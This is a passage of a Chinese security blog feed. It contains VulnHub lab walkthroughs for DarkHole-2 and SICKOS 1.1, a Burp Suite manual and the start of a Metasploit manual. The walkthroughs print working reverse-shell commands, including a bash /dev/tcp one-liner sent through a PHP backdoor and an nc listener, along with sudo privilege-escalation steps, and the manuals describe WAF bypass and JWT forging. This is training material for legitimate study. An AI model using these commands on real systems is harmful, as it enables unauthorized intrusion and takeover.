src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205144113396.png" alt="image-20250205144113396"></p><p>查看Crontab定时任务：**<code>cat /etc/crontab</code><strong>，发现定时任务，执行</strong><code>/opt/web</code><strong>里面的PHP代码，并且</strong>监听9999端口**</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205145149736.png" alt="image-20250205145149736"></p><p>查看一下**<code>/opt/web/index.php</code>**的PHP代码，发现是一个PHP后门代码</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205145233699.png" alt="image-20250205145233699"></p><h3 id="获取losy的权限"><a href="#获取losy的权限" class="headerlink" title="获取losy的权限"></a>获取losy的权限</h3><p>重新连接登陆 ssh，将本地端口 9999 端口与远程主机端口映射，访问本地端口转发到远程主机</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh  jehad@192.168.147.133  -L  9999:localhost:9999</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205144239488.png" alt="image-20250205144239488"></p><h3 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h3><p>记得我们查看过9999端口运行的程序，当我们看到源代码的内容时，我们看到这允许远程命令执行。而且这个脚本属于用户losy，然后我们就可以使用 SSH 隧道连接端口 9999，然后，访问 127.0.0.1:9999 进行 RCE。大概原理就是这样。</p><p>构造连接kali的命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash   -c   ‘bash -i &gt;&amp; /dev/tcp/192.168.147.131/1234&gt;&amp;1’</span><br></pre></td></tr></table></figure><p>使用URL 16进制编码:Url 编码&#x2F;解码 - 在线工具 (toolhelper.cn)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl &quot;127.0.0.1:9999/?cmd=bash%20-c%20&#x27;bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.147.131%2F1234%200%3E%261&#x27;&quot;</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205145652835.png" alt="image-20250205145652835"></p><p>kali再开一个窗口进行监听:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 1234</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205145818501.png" alt="image-20250205145818501"></p><p>在cmd处传入反弹Shell的参数，不过需要url编码一下，执行命令</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205184245232.png" alt="image-20250205184245232"></p><p>成功反弹Shell之后，搜索了一番之后，在losy的用户目录下的**.bash_history<strong>文件中发现了losy密码：</strong>gang**</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205184500264.png" alt="image-20250205184500264"></p><h3 id="切换用户"><a href="#切换用户" class="headerlink" title="切换用户"></a>切换用户</h3><p>SSH切换为losy用户：**<code>su - losy</code><strong>，输入</strong><code>sudo -l</code>**查看一下可以使用 <code>**sudo**</code> 命令执行的权限的命令</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205184732242.png" alt="image-20250205184732242"></p><p>发现<strong>python3</strong>可以用<strong>sudo</strong>，那就使用python3提权。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python3 -c &#x27;import os; os.system(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205185011390.png" alt="image-20250205185011390"></p><p>成功拿到第二个flag</p><p><img src="/2025/02/05/vulnhub%E9%9D%B6%E5%9C%BA-DarkHole-2/image-20250205185050157.png" alt="image-20250205185050157"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;VulnHub-DarkHole-2靶机实战&quot;&gt;&lt;a href=&quot;#VulnHub-DarkHole-2靶机实战&quot; class=&quot;headerlink&quot; title=&quot;VulnHub-DarkHole_2靶机实战&quot;&gt;&lt;/a&gt;VulnHub-DarkHole_2靶机</summary>
      
    
    
    
    <category term="Web" scheme="http://example.com/categories/Web/"/>
    
    <category term="DarkHole-2" scheme="http://example.com/categories/Web/DarkHole-2/"/>
    
    
    <category term="Web" scheme="http://example.com/tags/Web/"/>
    
  </entry>
  
  <entry>
    <title>vulnhub靶场,SICKOS:1.1</title>
    <link href="http://example.com/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/"/>
    <id>http://example.com/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/</id>
    <published>2025-01-31T16:00:00.000Z</published>
    <updated>2025-02-09T14:03:01.255Z</updated>
    
    <content type="html"><![CDATA[<h1 id="vulnhub靶场，SICKOS-1-1"><a href="#vulnhub靶场，SICKOS-1-1" class="headerlink" title="vulnhub靶场，SICKOS: 1.1"></a>vulnhub靶场，SICKOS: 1.1</h1><h2 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h2><p>靶机下载地址：<a href="https://www.vulnhub.com/entry/sickos-11,132/">https://www.vulnhub.com/entry/sickos-11,132/</a><br>攻击机：Kali Linux（192.168.147.131）<br>靶机：SICKOS: 1.1（192.168.147.132）</p><p>下载好靶机以后，在Vmware导入虚拟环境，SICKOS改为NAT共享主机网络模式</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205003013241-1738686640700-28.png" alt="image-20250205003013241"></p><h2 id="一、信息收集"><a href="#一、信息收集" class="headerlink" title="一、信息收集"></a>一、信息收集</h2><p>使用arp-scan确定靶机</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204231917385.png" alt="image-20250204231917385"></p><p>确定靶机地址为192.168.147.132</p><p>使用nmap查看靶机的端口开放情况</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204232422134.png" alt="image-20250204232422134"></p><p>开放端口：22、3128<br>这里可以看到3128端口是作为代理使用的，想访问80端口必须走3128端口代理</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204232955681.png" alt="image-20250204232955681"></p><p>然后访问80端口</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204233001891.png" alt="image-20250204233001891"></p><p>发现前端页面目前没有什么可利用的地方，所以进行深一步的探索，进行可访问的目录扫描</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204234629814.png" alt="image-20250204234629814"></p><p>目录分别扫描出了&#x2F;connect、&#x2F;robots.txt</p><p>访问&#x2F;robots.txt页面</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204234731567.png" alt="image-20250204234731567"></p><p>发现&#x2F;wolfcms页面，进行访问</p><h2 id="二、GetShell"><a href="#二、GetShell" class="headerlink" title="二、GetShell"></a>二、GetShell</h2><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204234916916.png" alt="image-20250204234916916"></p><p>查看一下当前页面的指纹信息</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204234951971.png" alt="image-20250204234951971"></p><p>发现CMS为wolfcms，查询一下是否有公开的payload </p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204235244983.png" alt="image-20250204235244983"></p><p>知道当前CMS存在文件上传漏洞，但需要先进到他的后台登陆地址，根据网上的后台地址进行访问</p><p>地址为：<a href="http://192.168.147.132/wolfcms/?/admin/login">http://192.168.147.132/wolfcms/?/admin/login</a></p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250204235358991.png" alt="image-20250204235358991"></p><p>直接弱口令登录，admin、admin，登录成功</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205000607279.png" alt="image-20250205000607279"></p><p>登陆成功后左上角点击files，发现文件上传地点</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205001103749.png" alt="image-20250205001103749"></p><p>上传成功</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205001220544.png" alt="image-20250205001220544"></p><p>需要更改一下监听的IP地址，端口随意</p><p>开始监听端口：1234</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205001344453.png" alt="image-20250205001344453"></p><p>访问一下木马文件</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205001548957.png" alt="image-20250205001548957"></p><p>反弹成功</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205001629391.png" alt="image-20250205001629391"></p><h2 id="三、提权过程"><a href="#三、提权过程" class="headerlink" title="三、提权过程"></a>三、提权过程</h2><p>找到站点存放目录</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205001727980.png" alt="image-20250205001727980"></p><p>发现以下文件</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205001858851.png" alt="image-20250205001858851"></p><p>在&#x2F;var&#x2F;www&#x2F;wolfcms目录下面发现数据库配置文件config.php</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205002032852.png" alt="image-20250205002032852"></p><p>发现了数据库账号密码，但经过实际查看并没什么有用的信息</p><p>查看当前的用户</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205002153188.png" alt="image-20250205002153188"></p><p>发现sickos用户，尝试用数据库的密码去登入sickos用户</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205002416377.png" alt="image-20250205002416377"></p><p>查看sickos用户的sudo权限</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205002459882.png" alt="image-20250205002459882"></p><p>可以看到sickos用户是具有所有权限的，直接使用sudo -i提权为root</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205002624138.png" alt="image-20250205002624138"></p><p>在其root目录下发现最终flag，靶机SICKOS: 1.1渗透结束</p><p><img src="/2025/02/01/vulnhub%E9%9D%B6%E5%9C%BA-SICKOS-1-1/image-20250205002646378.png" alt="image-20250205002646378"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;vulnhub靶场，SICKOS-1-1&quot;&gt;&lt;a href=&quot;#vulnhub靶场，SICKOS-1-1&quot; class=&quot;headerlink&quot; title=&quot;vulnhub靶场，SICKOS: 1.1&quot;&gt;&lt;/a&gt;vulnhub靶场，SICKOS: 1.1&lt;/h1</summary>
      
    
    
    
    <category term="Web" scheme="http://example.com/categories/Web/"/>
    
    <category term="SICKOS:1.1" scheme="http://example.com/categories/Web/SICKOS-1-1/"/>
    
    
    <category term="Web" scheme="http://example.com/tags/Web/"/>
    
  </entry>
  
  <entry>
    <title>BurpSuite简要手册</title>
    <link href="http://example.com/2025/01/08/BurpSuite%E7%AE%80%E8%A6%81%E6%89%8B%E5%86%8C/"/>
    <id>http://example.com/2025/01/08/BurpSuite%E7%AE%80%E8%A6%81%E6%89%8B%E5%86%8C/</id>
    <published>2025-01-07T16:00:00.000Z</published>
    <updated>2025-06-21T18:26:23.027Z</updated>
    
    <content type="html"><![CDATA[<h3 id="Burp-Suite-专业安全测试手册"><a href="#Burp-Suite-专业安全测试手册" class="headerlink" title="Burp Suite 专业安全测试手册"></a>Burp Suite 专业安全测试手册</h3><p>🔗 <strong>官方网站</strong>：<a href="https://portswigger.net/burp">https://portswigger.net/burp</a><br>🔗 <strong>社区版下载</strong>：<a href="https://portswigger.net/burp/communitydownload">https://portswigger.net/burp/communitydownload</a><br>🔗 <strong>文档中心</strong>：<a href="https://portswigger.net/burp/documentation">https://portswigger.net/burp/documentation</a></p><hr><h4 id="1-Burp-Suite-核心概述"><a href="#1-Burp-Suite-核心概述" class="headerlink" title="1. Burp Suite 核心概述"></a><strong>1. Burp Suite 核心概述</strong></h4><p>Burp Suite 是业界领先的 <strong>Web 应用安全测试平台</strong>，包含：<br>✅ <strong>代理拦截</strong>（Proxy）<br>✅ <strong>漏洞扫描</strong>（Scanner）<br>✅ <strong>请求重放</strong>（Repeater）<br>✅ <strong>暴力破解</strong>（Intruder）<br>✅ <strong>爬虫探测</strong>（Spider）<br>✅ <strong>序列分析</strong>（Sequencer）<br>✅ <strong>扩展商店</strong>（BApp Store）</p><blockquote><p>支持 Windows&#x2F;macOS&#x2F;Linux，社区版免费，专业版含高级扫描功能（$399&#x2F;年）</p></blockquote><hr><h4 id="2-安装与配置"><a href="#2-安装与配置" class="headerlink" title="2. 安装与配置"></a><strong>2. 安装与配置</strong></h4><p><strong>安装步骤</strong>：</p><ol><li>下载安装包（社区版&#x2F;专业版）</li><li>运行安装程序（Java 11+ 必需）</li><li>首次启动选择临时项目或创建新项目</li></ol><p><strong>浏览器代理配置</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">代理地址：127.0.0.1  </span><br><span class="line">代理端口：8080（默认）  </span><br><span class="line">忽略地址：127.0.0.1, localhost  </span><br></pre></td></tr></table></figure><blockquote><p>安装 PortSwigger CA 证书解决 HTTPS 警告：<code>http://burp/cert</code></p></blockquote><hr><h4 id="3-核心模块深度解析"><a href="#3-核心模块深度解析" class="headerlink" title="3. 核心模块深度解析"></a><strong>3. 核心模块深度解析</strong></h4><p><strong>A. Proxy（代理拦截）</strong></p><ul><li><strong>拦截控制</strong>：<ul><li><code>Intercept is on/off</code> 开关拦截</li><li><code>Forward</code> 放行请求</li><li><code>Drop</code> 丢弃请求</li><li><code>Action</code> 右键菜单发送到其他模块</li></ul></li><li><strong>历史记录</strong>：查看所有经过代理的请求&#x2F;响应</li><li><strong>匹配与替换</strong>：自动修改特定请求头（如 Cookie）</li></ul><p><strong>B. Target（目标分析）</strong></p><ul><li><p><strong>站点地图</strong>：自动生成应用结构树</p></li><li><p><strong>范围控制</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Target → Scope → Add  </span><br><span class="line">协议：http/https  </span><br><span class="line">主机：*.example.com  </span><br><span class="line">端口：80,443  </span><br></pre></td></tr></table></figure></li><li><p><strong>问题面板</strong>：汇总发现的安全漏洞</p></li></ul><p><strong>C. Scanner（漏洞扫描）</strong><br><em>（仅专业版）</em></p><ul><li><p><strong>扫描类型</strong>：</p><ul><li><strong>被动扫描</strong>：实时分析流量（零影响）</li><li><strong>主动扫描</strong>：主动发送测试载荷（可能影响服务）</li></ul></li><li><p><strong>配置策略</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">New Scan → Scan Configuration  </span><br><span class="line">选择：Critical/High 风险漏洞  </span><br><span class="line">排除：注销功能等危险路径  </span><br></pre></td></tr></table></figure></li></ul><p><strong>D. Intruder（入侵攻击）</strong></p><ul><li><p><strong>攻击类型</strong>：</p><table><thead><tr><th align="left"><strong>类型</strong></th><th align="left"><strong>用途</strong></th></tr></thead><tbody><tr><td align="left">Sniper</td><td align="left">单参数爆破（用户名&#x2F;密码）</td></tr><tr><td align="left">Battering ram</td><td align="left">多参数相同载荷</td></tr><tr><td align="left">Pitchfork</td><td align="left">多参数独立字典（用户名+密码）</td></tr><tr><td align="left">Cluster bomb</td><td align="left">多参数组合爆破（笛卡尔积）</td></tr></tbody></table></li><li><p><strong>载荷设置</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Payloads → Payload set  </span><br><span class="line">类型：Simple list / Runtime file / Numbers  </span><br><span class="line">添加字典：密码字典/模糊测试字符串  </span><br></pre></td></tr></table></figure></li></ul><p><strong>E. Repeater（请求重放）</strong></p><ul><li>手动修改并重发请求（支持多标签页）</li><li>对比不同版本响应（<code>Diff</code> 功能）</li><li>常用场景：<ul><li>绕过身份验证</li><li>测试业务逻辑漏洞</li><li>验证输入过滤规则</li></ul></li></ul><p><strong>F. Sequencer（会话分析）</strong></p><ul><li>分析会话令牌的随机性</li><li>操作流程：<ol><li>捕获包含 Token 的请求（如 Cookie）</li><li>发送到 Sequencer</li><li>点击 <code>Start live capture</code></li><li>查看熵值分析报告</li></ol></li></ul><hr><h4 id="4-渗透测试工作流"><a href="#4-渗透测试工作流" class="headerlink" title="4. 渗透测试工作流"></a><strong>4. 渗透测试工作流</strong></h4><p><strong>Step 1：初始配置</strong></p><ol><li>浏览器配置 Burp 代理</li><li>设置目标范围（Target → Scope）</li><li>关闭拦截（Proxy → Intercept off）</li></ol><p><strong>Step 2：爬取内容</strong></p><ul><li>自动爬虫：<code>Target → Site map → Spider this host</code></li><li>手动浏览：遍历所有应用功能</li></ul><p><strong>Step 3：漏洞扫描</strong></p><ol><li>右键目标 → <code>Scan</code></li><li>配置扫描策略（排除破坏性操作）</li><li>查看报告（Dashboard → Scan issues）</li></ol><p><strong>Step 4：手动测试</strong></p><ul><li>修改敏感参数（Repeater）</li><li>爆破关键接口（Intruder）</li><li>测试越权访问（修改用户ID）</li></ul><p><strong>Step 5：生成报告</strong><br><code>Report → Generate scan report</code>（HTML&#x2F;XML）</p><hr><h4 id="5-高级技巧与实战案例"><a href="#5-高级技巧与实战案例" class="headerlink" title="5. 高级技巧与实战案例"></a><strong>5. 高级技巧与实战案例</strong></h4><p><strong>A. 绕过 WAF 技巧</strong></p><ul><li><p><strong>分块传输</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Proxy → Options → Match and Replace  </span><br><span class="line">添加规则：^Content-Length$ 替换为 Transfer-Encoding  </span><br><span class="line">值：chunked  </span><br></pre></td></tr></table></figure></li><li><p><strong>IP 伪造</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: 127.0.0.1  </span><br><span class="line">Client-IP: 192.168.1.1  </span><br></pre></td></tr></table></figure></li></ul><p><strong>B. SQL 注入检测</strong></p><ol><li>捕获登录请求发送到 Intruder</li><li>标记用户名参数：<code>§username§</code></li><li>载荷选择 SQLi 字典：<code>Payloads → Add from list → SQL Injection</code></li><li>通过响应长度&#x2F;内容识别注入点</li></ol><p><strong>C. 业务逻辑漏洞挖掘</strong></p><ul><li><p><strong>价格篡改</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;product_id&quot;:1001, &quot;price&quot;: 99.9&#125; → 改为 0.01  </span><br></pre></td></tr></table></figure></li><li><p><strong>IDOR 越权</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /user/profile?user_id=100 → 改为 user_id=101  </span><br></pre></td></tr></table></figure></li></ul><p><strong>D. JWT 攻击</strong></p><ol><li><p>发送请求到 Repeater</p></li><li><p>安装 JWT Editor 扩展（BApp Store）</p></li><li><p>修改 JWT 载荷：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;user&quot;:&quot;admin&quot;, &quot;exp&quot;:9999999999&#125;  </span><br></pre></td></tr></table></figure></li><li><p>重新签名发送</p></li></ol><hr><h4 id="6-扩展生态（BApp-Store）"><a href="#6-扩展生态（BApp-Store）" class="headerlink" title="6. 扩展生态（BApp Store）"></a><strong>6. 扩展生态（BApp Store）</strong></h4><table><thead><tr><th align="left"><strong>扩展名称</strong></th><th align="left"><strong>功能</strong></th></tr></thead><tbody><tr><td align="left">Logger++</td><td align="left">高级流量记录与搜索</td></tr><tr><td align="left">Autorize</td><td align="left">自动越权测试</td></tr><tr><td align="left">Turbo Intruder</td><td align="left">高性能爆破（比原生快10倍）</td></tr><tr><td align="left">JWT Editor</td><td align="left">JWT 令牌操作工具</td></tr><tr><td align="left">SAML Raider</td><td align="left">SAML 协议攻击工具</td></tr><tr><td align="left">Retire.js</td><td align="left">检测过期的 JavaScript 库</td></tr></tbody></table><blockquote><p>安装路径：<code>Extender → BApp Store</code></p></blockquote><hr><h4 id="7-性能优化配置"><a href="#7-性能优化配置" class="headerlink" title="7. 性能优化配置"></a><strong>7. 性能优化配置</strong></h4><ul><li><p><strong>内存分配</strong>（启动脚本）：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># Windows (burp.bat)</span><br><span class="line">set JAVA_OPTS=-Xmx4g</span><br><span class="line"></span><br><span class="line"># Linux/macOS</span><br><span class="line">java -Xmx4g -jar burpsuite.jar</span><br></pre></td></tr></table></figure></li><li><p><strong>网络设置</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Project options → Connections  </span><br><span class="line">增加：Max concurrent requests = 50  </span><br><span class="line">超时：Socket timeout = 30000ms  </span><br></pre></td></tr></table></figure></li><li><p><strong>数据库优化</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Project options → Misc → Database  </span><br><span class="line">选择：High performance (HSQLDB)  </span><br><span class="line">定期：Compact database  </span><br></pre></td></tr></table></figure></li></ul><hr><h4 id="8-安全与合规指南"><a href="#8-安全与合规指南" class="headerlink" title="8. 安全与合规指南"></a><strong>8. 安全与合规指南</strong></h4><ol><li><strong>法律授权</strong>：必须获得书面渗透测试授权</li><li><strong>备份配置</strong>：导出项目设置（<code>Project options → Save settings</code>）</li><li><strong>敏感数据处理</strong>：<ul><li>启用项目级加密（<code>Project options → Misc → Encryption</code>）</li><li>测试后删除包含认证信息的数据</li></ul></li><li><strong>规避服务影响</strong>：<ul><li>主动扫描使用限速模式（<code>Scan configuration → Resource Pool</code>）</li><li>避免在生产环境使用 Intruder 高强度爆破</li></ul></li></ol><hr><h4 id="9-专业资源推荐"><a href="#9-专业资源推荐" class="headerlink" title="9. 专业资源推荐"></a><strong>9. 专业资源推荐</strong></h4><ul><li><p><strong>官方培训</strong>：<a href="https://portswigger.net/web-security">PortSwigger Web Security Academy</a>（免费实验）</p></li><li><p><strong>书籍推荐</strong>：《The Web Application Hacker’s Handbook》</p></li><li><p><strong>社区支持</strong>：<a href="https://forum.portswigger.net/">Burp Suite Forum</a></p></li><li><p><strong>配置备份</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Project options → Save options → 导出 json  </span><br></pre></td></tr></table></figure></li></ul>]]></content>
    
    
      
      
    <summary type="html">&lt;h3 id=&quot;Burp-Suite-专业安全测试手册&quot;&gt;&lt;a href=&quot;#Burp-Suite-专业安全测试手册&quot; class=&quot;headerlink&quot; title=&quot;Burp Suite 专业安全测试手册&quot;&gt;&lt;/a&gt;Burp Suite 专业安全测试手册&lt;/h3&gt;&lt;p&gt;🔗</summary>
      
    
    
    
    <category term="工具" scheme="http://example.com/categories/%E5%B7%A5%E5%85%B7/"/>
    
    
    <category term="安全工具" scheme="http://example.com/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/"/>
    
  </entry>
  
  <entry>
    <title>Metasploit简易手册</title>
    <link href="http://example.com/2025/01/07/Metasploit%E7%AE%80%E6%98%93%E6%89%8B%E5%86%8C/"/>
    <id>http://example.com/2025/01/07/Metasploit%E7%AE%80%E6%98%93%E6%89%8B%E5%86%8C/</id>
    <published>2025-01-06T16:00:00.000Z</published>
    <updated>2025-06-21T18:17:35.652Z</updated>
    
    <content type="html"><![CDATA[<ul><li><h3 id="Metasploit-详细使用手册"><a href="#Metasploit-详细使用手册" class="headerlink" title="Metasploit 详细使用手册"></a>Metasploit 详细使用手册</h3><p><strong>渗透测试框架终极武器</strong><br>🔗 <strong>官方网站</strong>：<a href="https://www.metasploit.com/">https://www.metasploit.com</a><br>🔗 <strong>文档中心</strong>：<a href="https://docs.metasploit.com/">https://docs.metasploit.com</a><br>🔗 <strong>GitHub 仓库</strong>：<a href="https://github.com/rapid7/metasploit-framework">https://github.com/rapid7/metasploit-framework</a></p><hr><h4 id="1-Metasploit-核心架构"><a href="#1-Metasploit-核心架构" class="headerlink" title="1. Metasploit 核心架构"></a><strong>1. Metasploit 核心架构</strong></h4><p>Metasploit 框架采用模块化设计，主要组件：</p><table><thead><tr><th align="left"><strong>组件</strong></th><th align="left"><strong>功能描述</strong></th></tr></thead><tbody><tr><td align="left"><strong>msfconsole</strong></td><td align="left">主交互界面（90%的操作在此完成）</td></tr><tr><td align="left"><strong>Modules</strong></td><td align="left">功能模块：Exploit（漏洞利用）、Payload（攻击载荷）、Auxiliary（辅助）等</td></tr><tr><td align="left"><strong>msfvenom</strong></td><td align="left">载荷生成器（创建免杀木马）</td></tr><tr><td align="left"><strong>Database</strong></td><td align="left">PostgreSQL集成，存储扫描结果和会话数据</td></tr><tr><td align="left"><strong>Meterpreter</strong></td><td align="left">高级内存驻留后渗透代理（无文件操作）</td></tr></tbody></table><hr><h4 id="2-完整安装指南"><a href="#2-完整安装指南" class="headerlink" title="2. 完整安装指南"></a><strong>2. 完整安装指南</strong></h4><p><strong>Kali Linux（预装）：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo apt update &amp;&amp; sudo apt full-upgrade</span><br><span class="line">msfdb init  # 初始化数据库</span><br></pre></td></tr></table></figure><p><strong>其他系统：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># Ubuntu</span><br><span class="line">curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &gt; msfinstall</span><br><span class="line">chmod +x msfinstall</span><br><span class="line">./msfinstall</span><br><span class="line"></span><br><span class="line"># Windows</span><br><span class="line">下载：https://windows.metasploit.com/metasploitframework-latest.msi</span><br><span class="line"></span><br><span class="line"># macOS</span><br><span class="line">brew tap homebrew/cask</span><br><span class="line">brew install metasploit</span><br></pre></td></tr></table></figure><p><strong>数据库配置：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">systemctl start postgresql  # 启动数据库</span><br><span class="line">msfdb init                 # 初始化</span><br><span class="line">db_status                  # 验证连接</span><br></pre></td></tr></table></figure><hr><h4 id="3-模块深度解析"><a href="#3-模块深度解析" class="headerlink" title="3. 模块深度解析"></a><strong>3. 模块深度解析</strong></h4><p><strong>A. Exploit 模块（漏洞利用）</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 搜索模块</span><br><span class="line">search type:exploit platform:windows name:smb</span><br><span class="line"></span><br><span class="line"># 常用参数</span><br><span class="line">set RHOSTS 192.168.1.100   # 目标IP</span><br><span class="line">set RPORT 445              # 目标端口</span><br><span class="line">set LHOST 192.168.1.50     # 监听IP</span><br><span class="line">set LPORT 4444             # 监听端口</span><br><span class="line">set TARGET 0               # 选择目标系统版本</span><br><span class="line">set PAYLOAD windows/x64/meterpreter/reverse_tcp</span><br></pre></td></tr></table></figure><p><strong>B. Payload 模块（攻击载荷）</strong></p><table><thead><tr><th align="left"><strong>类型</strong></th><th align="left"><strong>说明</strong></th><th align="left"><strong>示例</strong></th></tr></thead><tbody><tr><td align="left"><strong>反向Shell</strong></td><td 